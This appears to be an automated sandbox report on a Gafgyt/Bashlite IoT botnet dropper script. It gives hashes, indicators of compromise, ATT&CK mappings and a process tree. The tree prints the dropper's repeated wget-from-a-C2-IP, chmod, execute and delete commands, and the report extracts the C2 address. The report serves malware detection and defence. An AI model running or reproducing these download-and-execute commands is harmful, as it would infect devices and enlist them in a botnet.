gafgyt | e714fd9d746500c323367921c534fe1b33fcc17abb3346595a67d85542321bb8

Analysis

max time kernel
149s
max time network
150s
platform
debian-9_armhf
resource
debian9-armhf-20240418-en
resource tags

arch:armhfimage:debian9-armhf-20240418-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
19/02/2025, 05:55

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

e714fd9d746500c323367921c534fe1b33fcc17abb3346595a67d85542321bb8.sh
Size

2KB
MD5

ad70f1b36e82acde577b779fd8b6cd8d
SHA1

75537881fb592d2f8bb6fe38f9388d6ddf28d960
SHA256

e714fd9d746500c323367921c534fe1b33fcc17abb3346595a67d85542321bb8
SHA512

e3e61724a4d9bbb6df2ee9652c475cf0b9750baa6c285f36eac9ef8cf698a842a7366323fa2438c400c8b23c5755918320139aef1cbe79984aa4a21617874865

Score

10^/10

gafgyt botnet defense_evasion discovery

Malware Config

Extracted

Family

gafgyt

87.251.79.180:12345

Signatures

Detected Gafgyt variant 11 IoCs

resource	yara_rule
behavioral2/files/fstream-1.dat	family_gafgyt
behavioral2/files/fstream-2.dat	family_gafgyt
behavioral2/files/fstream-3.dat	family_gafgyt
behavioral2/files/fstream-4.dat	family_gafgyt
behavioral2/files/fstream-5.dat	family_gafgyt
behavioral2/files/fstream-6.dat	family_gafgyt
behavioral2/files/fstream-7.dat	family_gafgyt
behavioral2/files/fstream-8.dat	family_gafgyt
behavioral2/files/fstream-9.dat	family_gafgyt
behavioral2/files/fstream-10.dat	family_gafgyt
behavioral2/files/fstream-13.dat	family_gafgyt

Gafgyt family
gafgyt
Gafgyt/Bashlite
IoT botnet with numerous variants first seen in 2014.
botnet gafgyt

File and Directory Permissions Modification 1 TTPs 13 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
741	chmod
793	chmod
798	chmod
804	chmod
810	chmod
816	chmod
682	chmod
726	chmod
755	chmod
778	chmod
787	chmod
674	chmod
704	chmod

Executes dropped EXE 13 IoCs

ioc	pid	Process
/tmp/m-i.p-s.Sakura	675	e714fd9d746500c323367921c534fe1b33fcc17abb3346595a67d85542321bb8.sh
/tmp/m-p.s-l.Sakura	683	e714fd9d746500c323367921c534fe1b33fcc17abb3346595a67d85542321bb8.sh
/tmp/s-h.4-.Sakura	705	e714fd9d746500c323367921c534fe1b33fcc17abb3346595a67d85542321bb8.sh
/tmp/x-8.6-.Sakura	728	e714fd9d746500c323367921c534fe1b33fcc17abb3346595a67d85542321bb8.sh
/tmp/a-r.m-6.Sakura	742	e714fd9d746500c323367921c534fe1b33fcc17abb3346595a67d85542321bb8.sh
/tmp/x-3.2-.Sakura	756	e714fd9d746500c323367921c534fe1b33fcc17abb3346595a67d85542321bb8.sh
/tmp/a-r.m-7.Sakura	779	e714fd9d746500c323367921c534fe1b33fcc17abb3346595a67d85542321bb8.sh
/tmp/p-p.c-.Sakura	788	e714fd9d746500c323367921c534fe1b33fcc17abb3346595a67d85542321bb8.sh
/tmp/i-5.8-6.Sakura	794	e714fd9d746500c323367921c534fe1b33fcc17abb3346595a67d85542321bb8.sh
/tmp/m-6.8-k.Sakura	799	e714fd9d746500c323367921c534fe1b33fcc17abb3346595a67d85542321bb8.sh
/tmp/p-p.c-.Sakura	805	e714fd9d746500c323367921c534fe1b33fcc17abb3346595a67d85542321bb8.sh
/tmp/a-r.m-4.Sakura	811	e714fd9d746500c323367921c534fe1b33fcc17abb3346595a67d85542321bb8.sh
/tmp/a-r.m-5.Sakura	817	e714fd9d746500c323367921c534fe1b33fcc17abb3346595a67d85542321bb8.sh

Reads system routing table 1 TTPs 6 IoCs

Gets active network interfaces from /proc virtual filesystem.

discovery

Internet Connection Discovery

T1016.001

description	ioc	Process
File opened for reading	/proc/net/route	a-r.m-5.Sakura
File opened for reading	/proc/net/route	a-r.m-6.Sakura
File opened for reading	/proc/net/route	p-p.c-.Sakura
File opened for reading	/proc/net/route	m-6.8-k.Sakura
File opened for reading	/proc/net/route	p-p.c-.Sakura
File opened for reading	/proc/net/route	a-r.m-4.Sakura

Reads system network configuration 1 TTPs 6 IoCs

Uses contents of /proc filesystem to enumerate network settings.

discovery

Internet Connection Discovery

T1016.001

description	ioc	Process
File opened for reading	/proc/net/route	a-r.m-6.Sakura
File opened for reading	/proc/net/route	p-p.c-.Sakura
File opened for reading	/proc/net/route	m-6.8-k.Sakura
File opened for reading	/proc/net/route	p-p.c-.Sakura
File opened for reading	/proc/net/route	a-r.m-4.Sakura
File opened for reading	/proc/net/route	a-r.m-5.Sakura

Writes file to tmp directory 13 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/m-i.p-s.Sakura	wget
File opened for modification	/tmp/m-p.s-l.Sakura	wget
File opened for modification	/tmp/s-h.4-.Sakura	wget
File opened for modification	/tmp/i-5.8-6.Sakura	wget
File opened for modification	/tmp/a-r.m-5.Sakura	wget
File opened for modification	/tmp/a-r.m-4.Sakura	wget
File opened for modification	/tmp/x-8.6-.Sakura	wget
File opened for modification	/tmp/a-r.m-6.Sakura	wget
File opened for modification	/tmp/x-3.2-.Sakura	wget
File opened for modification	/tmp/a-r.m-7.Sakura	wget
File opened for modification	/tmp/p-p.c-.Sakura	wget
File opened for modification	/tmp/m-6.8-k.Sakura	wget
File opened for modification	/tmp/p-p.c-.Sakura	wget

/tmp/e714fd9d746500c323367921c534fe1b33fcc17abb3346595a67d85542321bb8.sh
/tmp/e714fd9d746500c323367921c534fe1b33fcc17abb3346595a67d85542321bb8.sh
1⤵
- Executes dropped EXE
PID:645
- /usr/bin/wget
  wget http://87.251.79.180/m-i.p-s.Sakura
  2⤵
  - Writes file to tmp directory
  PID:647
- /bin/chmod
  chmod +x m-i.p-s.Sakura
  2⤵
  - File and Directory Permissions Modification
  PID:674
- /tmp/m-i.p-s.Sakura
  ./m-i.p-s.Sakura
  2⤵
  PID:675
- /bin/rm
  rm -rf m-i.p-s.Sakura
  2⤵
  PID:677
- /usr/bin/wget
  wget http://87.251.79.180/m-p.s-l.Sakura
  2⤵
  - Writes file to tmp directory
  PID:678
- /bin/chmod
  chmod +x m-p.s-l.Sakura
  2⤵
  - File and Directory Permissions Modification
  PID:682
- /tmp/m-p.s-l.Sakura
  ./m-p.s-l.Sakura
  2⤵
  PID:683
- /bin/rm
  rm -rf m-p.s-l.Sakura
  2⤵
  PID:686
- /usr/bin/wget
  wget http://87.251.79.180/s-h.4-.Sakura
  2⤵
  - Writes file to tmp directory
  PID:688
- /bin/chmod
  chmod +x s-h.4-.Sakura
  2⤵
  - File and Directory Permissions Modification
  PID:704
- /tmp/s-h.4-.Sakura
  ./s-h.4-.Sakura
  2⤵
  PID:705
- /bin/rm
  rm -rf s-h.4-.Sakura
  2⤵
  PID:708
- /usr/bin/wget
  wget http://87.251.79.180/x-8.6-.Sakura
  2⤵
  - Writes file to tmp directory
  PID:709
- /bin/chmod
  chmod +x x-8.6-.Sakura
  2⤵
  - File and Directory Permissions Modification
  PID:726
- /tmp/x-8.6-.Sakura
  ./x-8.6-.Sakura
  2⤵
  PID:728
- /bin/rm
  rm -rf x-8.6-.Sakura
  2⤵
  PID:731
- /usr/bin/wget
  wget http://87.251.79.180/a-r.m-6.Sakura
  2⤵
  - Writes file to tmp directory
  PID:733
- /bin/chmod
  chmod +x a-r.m-6.Sakura
  2⤵
  - File and Directory Permissions Modification
  PID:741
- /tmp/a-r.m-6.Sakura
  ./a-r.m-6.Sakura
  2⤵
  - Reads system routing table
  - Reads system network configuration
  PID:742
- /bin/rm
  rm -rf a-r.m-6.Sakura
  2⤵
  PID:745
- /usr/bin/wget
  wget http://87.251.79.180/x-3.2-.Sakura
  2⤵
  - Writes file to tmp directory
  PID:746
- /bin/chmod
  chmod +x x-3.2-.Sakura
  2⤵
  - File and Directory Permissions Modification
  PID:755
- /tmp/x-3.2-.Sakura
  ./x-3.2-.Sakura
  2⤵
  PID:756
- /bin/rm
  rm -rf x-3.2-.Sakura
  2⤵
  PID:758
- /usr/bin/wget
  wget http://87.251.79.180/a-r.m-7.Sakura
  2⤵
  - Writes file to tmp directory
  PID:760
- /bin/chmod
  chmod +x a-r.m-7.Sakura
  2⤵
  - File and Directory Permissions Modification
  PID:778
- /tmp/a-r.m-7.Sakura
  ./a-r.m-7.Sakura
  2⤵
  PID:779
- /bin/rm
  rm -rf a-r.m-7.Sakura
  2⤵
  PID:781
- /usr/bin/wget
  wget http://87.251.79.180/p-p.c-.Sakura
  2⤵
  - Writes file to tmp directory
  PID:783
- /bin/chmod
  chmod +x p-p.c-.Sakura
  2⤵
  - File and Directory Permissions Modification
  PID:787
- /tmp/p-p.c-.Sakura
  ./p-p.c-.Sakura
  2⤵
  - Reads system routing table
  - Reads system network configuration
  PID:788
- /bin/rm
  rm -rf p-p.c-.Sakura
  2⤵
  PID:791
- /usr/bin/wget
  wget http://87.251.79.180/i-5.8-6.Sakura
  2⤵
  - Writes file to tmp directory
  PID:792
- /bin/chmod
  chmod +x i-5.8-6.Sakura
  2⤵
  - File and Directory Permissions Modification
  PID:793
- /tmp/i-5.8-6.Sakura
  ./i-5.8-6.Sakura
  2⤵
  PID:794
- /bin/rm
  rm -rf i-5.8-6.Sakura
  2⤵
  PID:796
- /usr/bin/wget
  wget http://87.251.79.180/m-6.8-k.Sakura
  2⤵
  - Writes file to tmp directory
  PID:797
- /bin/chmod
  chmod +x m-6.8-k.Sakura
  2⤵
  - File and Directory Permissions Modification
  PID:798
- /tmp/m-6.8-k.Sakura
  ./m-6.8-k.Sakura
  2⤵
  - Reads system routing table
  - Reads system network configuration
  PID:799
- /bin/rm
  rm -rf m-6.8-k.Sakura
  2⤵
  PID:802
- /usr/bin/wget
  wget http://87.251.79.180/p-p.c-.Sakura
  2⤵
  - Writes file to tmp directory
  PID:803
- /bin/chmod
  chmod +x p-p.c-.Sakura
  2⤵
  - File and Directory Permissions Modification
  PID:804
- /tmp/p-p.c-.Sakura
  ./p-p.c-.Sakura
  2⤵
  - Reads system routing table
  - Reads system network configuration
  PID:805
- /bin/rm
  rm -rf p-p.c-.Sakura
  2⤵
  PID:808
- /usr/bin/wget
  wget http://87.251.79.180/a-r.m-4.Sakura
  2⤵
  - Writes file to tmp directory
  PID:809
- /bin/chmod
  chmod +x a-r.m-4.Sakura
  2⤵
  - File and Directory Permissions Modification
  PID:810
- /tmp/a-r.m-4.Sakura
  ./a-r.m-4.Sakura
  2⤵
  - Reads system routing table
  - Reads system network configuration
  PID:811
- /bin/rm
  rm -rf a-r.m-4.Sakura
  2⤵
  PID:814
- /usr/bin/wget
  wget http://87.251.79.180/a-r.m-5.Sakura
  2⤵
  - Writes file to tmp directory
  PID:815
- /bin/chmod
  chmod +x a-r.m-5.Sakura
  2⤵
  - File and Directory Permissions Modification
  PID:816
- /tmp/a-r.m-5.Sakura
  ./a-r.m-5.Sakura
  2⤵
  - Reads system routing table
  - Reads system network configuration
  PID:817
- /bin/rm
  rm -rf a-r.m-5.Sakura
  2⤵
  PID:820

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/a-r.m-5.Sakura

Filesize
98KB

MD5
39d382cb3f8fe19212ad98b82e2cded8

SHA1
d240dc083ffd27dba09c2c4aaa7926bc91ccb2ca

SHA256
49e3fe8176e4405796a225c0a2f9ce39b3efa0736dc1ce253c0d4c76bd89d8ca

SHA512
580856dafaba853524cbaec415c0c20363768d306761060f4214d7f7824708181f16b7d3a6c43d58eb9ceafee52456c3e9b9685b205ad447a4bf4e4c6997f03e

Download Submit
/tmp/a-r.m-6.Sakura

Filesize
118KB

MD5
230fded12db7339d3a9fef64248e25a9

SHA1
e41493b48e0ffcdd3f84ce7fbf7c37e367dbef51

SHA256
d71a424563270b288070cd8e7c35e0636422c96a24f7e39ba6eb4c1be4b48d14

SHA512
9263f03e6feb56b55cb133918aaacb45fa7495634377bce017505a30c02b66ae693e6cc72cf985fb5c27eb689543792617ba4c22580927f9df919b8fb6527bbd

Download Submit
/tmp/a-r.m-7.Sakura

Filesize
91KB

MD5
4b1f83e191c1fda1e0441aa94da85cd6

SHA1
0ec28049e0a19d0ed9880bffdef9435b69dc1be2

SHA256
2284444c6b45845f09c9ed0bae3ba43ae7177d34630213a6cf8b79c2a98c458a

SHA512
4c05ed93bb1d623c03a5a53fb78be3fe209e50bf2d4b47f6e65df19b779f1ff282b823ccd7c26433874a3355d57f8c4902457e0d6b74204b9ec692b93dc95b6f

Download Submit
/tmp/i-5.8-6.Sakura

Filesize
96KB

MD5
a3aa48b845ac8be0053c78dc729b68df

SHA1
79ddf8a413f85d715247a9f2060fbaa3b94ddacd

SHA256
a5cf164f6966ecd73195c68a9122deafdf2a7fa80b029b9fb5fbffeea139f2e8

SHA512
b4fccb7ad12df985d2933bd7f1e46b532fb813a0a34fb8349cbdcf3b23094f254b77579f42404b44057a6436bfc3e38b66b77df3710ceaf13f9acf4ed3be5c75

Download Submit
/tmp/m-6.8-k.Sakura

Filesize
156KB

MD5
ff60dec55424ba5ad6976a5cbec4dbac

SHA1
ecf2c65f29cac600ad8622d5b950c2471b225641

SHA256
72807c35f0fa3b7b6fc3cb7980c2db8e18a6133ef3da827546e87505a6d933b9

SHA512
ad04ac10c34bed5db70204e7db7d76b92bad563d73b425cfa3aba457fca88c67b037119d50bc4edff1fb5414151862dfde6749ffad72de1d27f77f1e72320af4

Download Submit
/tmp/m-i.p-s.Sakura

Filesize
123KB

MD5
89baf8a811dc892fc622c12d249fec06

SHA1
d04ae8d3fc365aa2d7499f8120069666881bf794

SHA256
a23b88938a22c85d32e6e74a538281f724db6f4bfc6adc869f9aeee58855e149

SHA512
cf0b70f2333897eda18f80d4456700f91b462b4d0af9e3ae99dcc43b45b45d27b503691528c47b9be1c2ae8b3bc96d92c6966cf1d6a014bbcdfb64d94710c893

Download Submit
/tmp/m-p.s-l.Sakura

Filesize
123KB

MD5
301abf86c75d3c8e4bf26d4c0ea8aafa

SHA1
0e60857bf7d0a8d5eddd850042682b14aec03017

SHA256
5ab6f4941c390d0c882f0ea0572c94282b6c7262ae288928d4a7461e1f87a5f2

SHA512
9ecdfe31bc874ee7ce5c3e02844d5660d6420b4478a4ed08fbf478ffb07b6b27a9aebff57682fd10219227f9516c0c18d59f22297ec848e854e79aa4fcc5c7fa

Download Submit
/tmp/p-p.c-.Sakura

Filesize
105KB

MD5
212450f9dbb99390dedafec72be65ab1

SHA1
afffa9700118c0840519970eca8890cba9cd1563

SHA256
618c3e2a8bc6b97188b8eb0d25b937711946c23206bb09b5be008b9969a81974

SHA512
fa73feaa08ee1f822ce0829f1b3ce6f8ea1a06cbb7e397699fa792b324eca1f0c223a9d041faad1068a795af918b376e992786e3d40473a5cd19b0400d46a926

Download Submit
/tmp/s-h.4-.Sakura

Filesize
86KB

MD5
16cb232f26bfda683ef74182627ff3d5

SHA1
79805198d3660ea9a1686b8a79d236e785896919

SHA256
73da39758288f46e00b0fedcf2544676d7c748d8aba002263668fcce604941fb

SHA512
9bca8151c28e32651bb2fd29ab0a465d458708eeb384f89f3d31e9c19f36d393a92ad237598ad51c0bf04b060382a02337ed5003f1fa81a1642c68f4acc3030a

Download Submit
/tmp/x-3.2-.Sakura

Filesize
83KB

MD5
9407f2e571451c2980a284725a28da80

SHA1
a9181678ee792658f0408a89acb0e5ddc8972260

SHA256
b67b9fb5c81dc96e34c12e5ffebe16db92bb03d2d1fa6dbe16f212992b764f3d

SHA512
4218ba1fd072c1b8c0974e73530413a141e864c00c5593bd2219db57585f2d2d9aaedb9751b3f2c8baa40eebd6b976b9c573411f912e192f0319fb9b85130fac

Download Submit
/tmp/x-8.6-.Sakura

Filesize
92KB

MD5
cd3083795e82e94e9f12349e5e0f308e

SHA1
da31faa030e36a3d66e36025d5f9bd90da168795

SHA256
5f93cde41bf79ff93865979d26497fade27d144095d4c0f6d4016e156c4699b7

SHA512
40a13cb82f1fd5cfea6c2bb5b368af82deb783c414cc1b86dfa771d57845e7c7f1c91a605235871e3bc4f90ed7acabb5a22e48006fa61448d5a6cacc1e3d546e

Download Submit

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads